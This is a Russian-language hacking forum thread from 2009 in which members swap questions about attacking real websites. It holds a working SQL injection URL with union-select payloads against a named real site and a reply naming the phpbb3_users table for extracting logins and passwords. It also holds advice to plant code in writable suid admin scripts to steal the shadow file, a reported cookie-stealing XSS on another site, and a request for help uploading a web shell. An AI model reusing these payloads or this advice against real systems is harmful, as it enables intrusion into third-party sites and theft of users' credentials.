11.07.2009, 17:30
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
for DIR in /etc /bin /shit
do
ls -ld $DIR
done
Чет такой скрыпт не работает(
Зато если вписать echo 5,то будет работать )
|
|
|
11.07.2009, 20:03
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Что дают suid и sgid файлы?
прочитал статью на инаттаке.
http://www.inattack.ru/article/216.html
Относительно понял. А есть ли статья, как можно использовать в своих целях биты?
|
|
|
|
13.07.2009, 10:16
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами:
9989667
Репутация:
240
|
|
Сообщение от Ershik
Что дают suid и sgid файлы?
прочитал статью на инаттаке.
http://www.inattack.ru/article/216.html
Относительно понял. А есть ли статья, как можно использовать в своих целях биты?
Бывает опытные админы составляют такие скрипти, например видел на одном хостинге, которые создавали пользователя и т.д, не помню на чем, .sh или пхп или перл, ето так для примера, суть не в етом. Ищешь, если достуны на запись, вставляешь свой код, а дальше по обдстановке что тебе нужно, например: чмоднуть или стянуть шедов 
Последний раз редактировалось The_HuliGun; 17.07.2009 в 13:42..
|
|
|
|
12.07.2009, 13:20
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
С нами:
10023542
Репутация:
1
|
|
Hi
pls i need help with this site if u may ??
i had access to admin panel in site but only allowed HTML script modified
is there is any way to upload shell by HTML or code it to rfi or lfi
than for help body
and sorry again for my English
|
|
|
|
12.07.2009, 14:03
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
No, you can't.
|
|
|
|
12.07.2009, 14:39
|
|
Познающий
Регистрация: 28.03.2009
Сообщений: 30
С нами:
9012610
Репутация:
1
|
|
вобщем трабла...
есть два путя)
например
http://exaple.com/gg/
и
http://exaple.com/forum/
Вобщем нашел пассивную xss в каталоге gg. Выводит алерт с куками только в сафари и в ослике. в опере выводит пустой алерт... встречаюсь с этой шнягой первый раз. в чем проблема?
|
|
|
|
12.07.2009, 14:42
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
Сообщение от gLuk!
в чем проблема?
А сам как думаеш? В браузере! 
|
|
|
|
12.07.2009, 14:44
|
|
Познающий
Регистрация: 28.03.2009
Сообщений: 30
С нами:
9012610
Репутация:
1
|
|
можно ли какнить заставить работать в опере?
|
|
|
|
13.07.2009, 07:57
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами:
8886744
Репутация:
-67
|
|
Подскажите плиз. во скуля http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),2,3,4,5-- так вот, там на сайте есть форум phpbb. я запустил скрипт kiborg'a на определение версии, он показал 3.0.4 Подскажите плиз, какие там таблицы с именами и пассами юзеров и колонки. Читал elekтовский пост,насчёт табиц phpbb_
phpbb2_, но с ними не катит. http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),3,4,5+from+phpbb_--
|
|
|
|
13.07.2009, 08:09
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Сообщение от nub-hacker
Подскажите плиз. во скуля http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),2,3,4,5-- так вот, там на сайте есть форум phpbb. я запустил скрипт kiborg'a на определение версии, он показал 3.0.4 Подскажите плиз, какие там таблицы с именами и пассами юзеров и колонки. Читал elekтовский пост,насчёт табиц phpbb_
phpbb2_, но с ними не катит. http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),3,4,5+from+phpbb_--
table users: phpbb3_users
Колонки сам вырвешь/найдешь
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
